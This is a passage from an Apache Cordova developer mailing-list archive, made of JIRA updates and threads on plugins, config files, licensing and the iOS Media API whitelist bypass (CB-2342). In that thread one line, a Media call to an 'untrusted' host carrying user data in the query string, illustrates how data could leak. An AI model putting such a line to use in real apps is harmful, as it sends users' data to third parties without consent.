Tommy's use of the quote is a masterstroke really considering that 95% of
the Cordova committers are Canadians.
On Fri, Feb 1, 2013 at 3:32 PM, Steven Gill wrote:
> +1 to using classic hockey quote to impress Canadians and improve chances
>
> On Fri, Feb 1, 2013 at 11:31 AM, tommy-carlos Willia
+1 to using classic hockey quote to impress Canadians and improve chances
On Fri, Feb 1, 2013 at 11:31 AM, tommy-carlos Williams
wrote:
> Gord's talk sounds awesome :)
>
> On 02/02/2013, at 2:30, Gord Tanner wrote:
>
> > If I am selected my talk is going to be on the dirty hacks that are in
> ou
Gotcha, so whitelist is only for preventing app hijacking, and not
preventing any sort of tracking. ( ie, it only prevents where you load
stuff from, and not where you send it to )
On Fri, Feb 1, 2013 at 3:13 PM, Shazron wrote:
> Send data? The url download only cares what is the final result, s
Send data? The url download only cares what is the final result, so you can
send the human genome down as a query string it doesn't matter, as long as
the final result is an audio file, it can play it. If its garbage, it won't
play it - unless its a known exploit with the iOS media playback code,
w
[
https://issues.apache.org/jira/browse/CB-2342?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569225#comment-13569225
]
Shazron Abdullah commented on CB-2342:
--
Yes, they are blocked. This only relates to the
[
https://issues.apache.org/jira/browse/CB-2287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569175#comment-13569175
]
Filip Maj commented on CB-2287:
---
Thanks.
Too bad it still freezes around test #190 :(
Where t
[
https://issues.apache.org/jira/browse/CB-1365?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569139#comment-13569139
]
Filip Maj commented on CB-1365:
---
Updated top-level guide per Shaz's suggestions.
[
https://issues.apache.org/jira/browse/CB-2287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569132#comment-13569132
]
Tim Kim commented on CB-2287:
-
Ok, it's in there now.
https://git-wip-us.apache.org/repos/asf?p
[
https://issues.apache.org/jira/browse/CB-2287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569120#comment-13569120
]
Filip Maj commented on CB-2287:
---
Let's merge that back into cordova-blackberry ASAP.
Updated: http://wiki.apache.org/cordova/PluginDesign
Anis, can you do us a solid and review the document based on your latest
experience authoring plug man? Like make sure the doc is not missing
anything and is up to date?
On 2/1/13 12:09 PM, "Andrew Grieve" wrote:
>Great! thanks!
>
>
>On Fri,
[
https://issues.apache.org/jira/browse/CB-2287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569116#comment-13569116
]
Tim Kim commented on CB-2287:
-
I made some updates to the JS. This fixes some but not all of the
[
https://issues.apache.org/jira/browse/CB-1480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569109#comment-13569109
]
Benn Mapes commented on CB-1480:
I'll take a look at this bug if you could you provide me wit
My point was, can't a 3rd party library from a trusted+allowed domain play
audio from an untrusted domain, and send data via the querystring?
new Media("http://untrusted/file.mp3?userdata=...",win,lose).play();
I have additional comments on the JIRA issue, here:
https://issues.apache.org/jira/bro
[
https://issues.apache.org/jira/browse/CB-2342?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569099#comment-13569099
]
Jesse MacFadyen commented on CB-2342:
-
what about the , , , tags? Are these properly
bl
[
https://issues.apache.org/jira/browse/CB-2300?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569097#comment-13569097
]
Filip Maj commented on CB-2300:
---
Awesome, thanks a lot man!
> ./bin/create scr
[
https://issues.apache.org/jira/browse/CB-2343?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Filip Maj updated CB-2343:
--
Fix Version/s: 2.4.0
> Can not add plugin to project using 'cordova plugin add '
> ---
[
https://issues.apache.org/jira/browse/CB-2343?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569094#comment-13569094
]
Filip Maj commented on CB-2343:
---
Thanks a lot. I will vet this plugin before we tag 2.4.0 and m
No this is totally restricted to playing audio and the plugin. I suppose if
there is a problem with Apple's media playing code, sure
On Fri, Feb 1, 2013 at 12:57 PM, Jesse wrote:
> it is a security break regardless, and you can do much more than play rogue
> audio. For example send data in the
Joe Reda created CB-2343:
Summary: Can not add plugin to project using 'cordova plugin add
'
Key: CB-2343
URL: https://issues.apache.org/jira/browse/CB-2343
Project: Apache Cordova
Issue Type: Bug
it is a security break regardless, and you can do much more than play rogue
audio. For example send data in the url
On Fri, Feb 1, 2013 at 12:27 PM, Shazron wrote:
> Seems like a harmless thing for now for us to fix and re-tag, since the
> most this does is allow people to play rogue audio
[
https://issues.apache.org/jira/browse/CB-2342?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569058#comment-13569058
]
Shazron Abdullah commented on CB-2342:
--
As commented by Andrew Grieve, CDVSound.m does n
Shazron Abdullah created CB-2342:
Summary: Media API allows non-whitelisted audio to be played
Key: CB-2342
URL: https://issues.apache.org/jira/browse/CB-2342
Project: Apache Cordova
Issue Ty
[
https://issues.apache.org/jira/browse/CB-105?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569043#comment-13569043
]
Leif Ullman commented on CB-105:
Thanks Becky - that fixed it for me. I'm running 2.2.0 and j
Seems like a harmless thing for now for us to fix and re-tag, since the
most this does is allow people to play rogue audio files I guess? I'll file
an issue.
On Fri, Feb 1, 2013 at 11:11 AM, Andrew Grieve wrote:
> CDVSound.m doesn't set the User-Agent, which I think means it's not being
> restr
Tim Kim created CB-2341:
---
Summary: Need to update getting starting guide for BlackBerry to
reflect changes to bin/create
Key: CB-2341
URL: https://issues.apache.org/jira/browse/CB-2341
Project: Apache Cordova
[
https://issues.apache.org/jira/browse/CB-2300?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13569031#comment-13569031
]
Tim Kim commented on CB-2300:
-
Fixed here:
https://git-wip-us.apache.org/repos/asf?p=cordova-bla
[
https://issues.apache.org/jira/browse/CB-2300?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Tim Kim resolved CB-2300.
-
Resolution: Fixed
> ./bin/create script for BlackBerry should employ parameters consistent with
> other platfor
Great! thanks!
On Fri, Feb 1, 2013 at 3:06 PM, Brian LeRoux wrote:
> Seems like a wiki thing.
>
> On Fri, Feb 1, 2013 at 12:01 PM, Filip Maj wrote:
> > Its just a document..
> >
> > Ill move it / create a spot for it in the wiki ?
> >
> > On 2/1/13 11:56 AM, "Brian LeRoux" wrote:
> >
> >>Yup,
Seems like a wiki thing.
On Fri, Feb 1, 2013 at 12:01 PM, Filip Maj wrote:
> Its just a document..
>
> Ill move it / create a spot for it in the wiki ?
>
> On 2/1/13 11:56 AM, "Brian LeRoux" wrote:
>
>>Yup, you only need to update the NOTICE and only if we are distributing.
>>
>>On Fri, Feb 1, 2
Its just a document..
Ill move it / create a spot for it in the wiki ?
On 2/1/13 11:56 AM, "Brian LeRoux" wrote:
>Yup, you only need to update the NOTICE and only if we are distributing.
>
>On Fri, Feb 1, 2013 at 11:47 AM, Filip Maj wrote:
>> isn't mit compatible with apache license?
>>
>> On
Yup, you only need to update the NOTICE and only if we are distributing.
On Fri, Feb 1, 2013 at 11:47 AM, Filip Maj wrote:
> isn't mit compatible with apache license?
>
> On 2/1/13 11:41 AM, "Andrew Grieve" wrote:
>
>>Did anyone act on putting this on the wiki?
>>
>>We'd need to ask Andrew to re
[
https://issues.apache.org/jira/browse/CB-2049?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Filip Maj updated CB-2049:
--
Fix Version/s: (was: 2.4.0)
2.5.0
Moving to 2.5.0.
> Remove test dependenc
isn't mit compatible with apache license?
On 2/1/13 11:41 AM, "Andrew Grieve" wrote:
>Did anyone act on putting this on the wiki?
>
>We'd need to ask Andrew to re-license from MIT -> Apache before we did so
>I
>think.
>
>
>On Wed, Jan 9, 2013 at 2:10 PM, Shazron wrote:
>
>> +1
>>
>>
>> On Wed,
Did anyone act on putting this on the wiki?
We'd need to ask Andrew to re-license from MIT -> Apache before we did so I
think.
On Wed, Jan 9, 2013 at 2:10 PM, Shazron wrote:
> +1
>
>
> On Wed, Jan 9, 2013 at 10:57 AM, Filip Maj wrote:
>
> > https://github.com/alunny/cordova-plugin-spec
> >
>
I have made edits to https://issues.apache.org/jira/browse/CB-2103
Sets up the issues and whatnot for 2.5 to address this.
On 1/30/13 9:04 PM, "Tommy-Carlos Williams" wrote:
>+1
>
>Especially helpful with say S3
>
>I had to hack my cordovaLib while getting it right the first time.
>
>
>
>On 31/
Gord's talk sounds awesome :)
On 02/02/2013, at 2:30, Gord Tanner wrote:
> If I am selected my talk is going to be on the dirty hacks that are in our
> codebase.
>
> Kind of pealing back the layers and showing some of the crazy stuff we need
> to do to get things working clean for our users.
>
[
https://issues.apache.org/jira/browse/CB-2304?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Shazron Abdullah resolved CB-2304.
--
Resolution: Not A Problem
Essentially this is not Cordova's problem since the tool was designed fo
CDVSound.m doesn't set the User-Agent, which I think means it's not being
restricted to the white-list.
On Fri, Feb 1, 2013 at 1:45 PM, Shazron wrote:
> Not that I am aware of. There might be something related to the user-agent
> changes. Let me verify your results.
>
>
> On Fri, Feb 1, 2013 at
Filip Maj created CB-2338:
-
Summary: Add "body" property to FileTransferError object on Bada
Key: CB-2338
URL: https://issues.apache.org/jira/browse/CB-2338
Project: Apache Cordova
Issue Type: Sub-ta
Filip Maj created CB-2339:
-
Summary: Add "body" property to FileTransferError object on webOS
Key: CB-2339
URL: https://issues.apache.org/jira/browse/CB-2339
Project: Apache Cordova
Issue Type: Sub-t
Filip Maj created CB-2340:
-
Summary: Add "body" property to FileTransferError object on
BlackBerry
Key: CB-2340
URL: https://issues.apache.org/jira/browse/CB-2340
Project: Apache Cordova
Issue Type:
Filip Maj created CB-2337:
-
Summary: Add "body" property to FileTransferError object on
Windows Phone 8
Key: CB-2337
URL: https://issues.apache.org/jira/browse/CB-2337
Project: Apache Cordova
Issue
Filip Maj created CB-2336:
-
Summary: Add "body" property to FileTransferError object on
Windows Phone 7
Key: CB-2336
URL: https://issues.apache.org/jira/browse/CB-2336
Project: Apache Cordova
Issue
Filip Maj created CB-2335:
-
Summary: Add "body" property to FileTransferError object on
Windows 8
Key: CB-2335
URL: https://issues.apache.org/jira/browse/CB-2335
Project: Apache Cordova
Issue Type:
Filip Maj created CB-2334:
-
Summary: Add "body" property to FileTransferError object on iOS
Key: CB-2334
URL: https://issues.apache.org/jira/browse/CB-2334
Project: Apache Cordova
Issue Type: Sub-tas
Filip Maj created CB-2333:
-
Summary: Add "body" property to FileTransferError object on Android
Key: CB-2333
URL: https://issues.apache.org/jira/browse/CB-2333
Project: Apache Cordova
Issue Type: Sub
Filip Maj created CB-2332:
-
Summary: Document new "body" property on FileTransferError
Key: CB-2332
URL: https://issues.apache.org/jira/browse/CB-2332
Project: Apache Cordova
Issue Type: Sub-task
[
https://issues.apache.org/jira/browse/CB-2103?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Filip Maj updated CB-2103:
--
Component/s: CordovaJS
Fix Version/s: (was: 2.4.0)
2.5.0
Assi
Filip Maj created CB-2331:
-
Summary: Add tests for FileTransferError to test response body
Key: CB-2331
URL: https://issues.apache.org/jira/browse/CB-2331
Project: Apache Cordova
Issue Type: Sub-task
Not that I am aware of. There might be something related to the user-agent
changes. Let me verify your results.
On Fri, Feb 1, 2013 at 9:03 AM, Becky Gibson wrote:
> Did I miss a change in our whitelist implementation on iOS?
>
> It used to be that I had to make sure audio.ibeat.org was in the
[
https://issues.apache.org/jira/browse/CB-2323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Filip Maj updated CB-2323:
--
Description:
The root element in the config document should be {{}}, not
{{}}.
This is to align us with the W3C
[
https://issues.apache.org/jira/browse/CB-1365?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Filip Maj updated CB-1365:
--
Description:
Is there documentation somewhere regarding options in the config.xml file for
phonegap/cordova 2.0,
Filip Maj created CB-2330:
-
Summary: webOS config.xml document should use instead of
Key: CB-2330
URL: https://issues.apache.org/jira/browse/CB-2330
Project: Apache Cordova
Issue Type: Sub-task
Filip Maj created CB-2329:
-
Summary: Bada config.xml document should use instead of
Key: CB-2329
URL: https://issues.apache.org/jira/browse/CB-2329
Project: Apache Cordova
Issue Type: Sub-task
If I am selected my talk is going to be on the dirty hacks that are in our
codebase.
Kind of pealing back the layers and showing some of the crazy stuff we need
to do to get things working clean for our users.
On the theme of : "Our Pain is your Gain"
For example I am going to talk about the hac
Tommy,
Working hockey metaphors into the conversation will only increase your
chances of being selected to talk 1000%. Well done.
I'd love to make it out myself. If selected, my planned talk is also
on something that should exist by July, the polyfil of the WebSpeech
API into PhoneGap Android.
S
56 matches
Mail list logo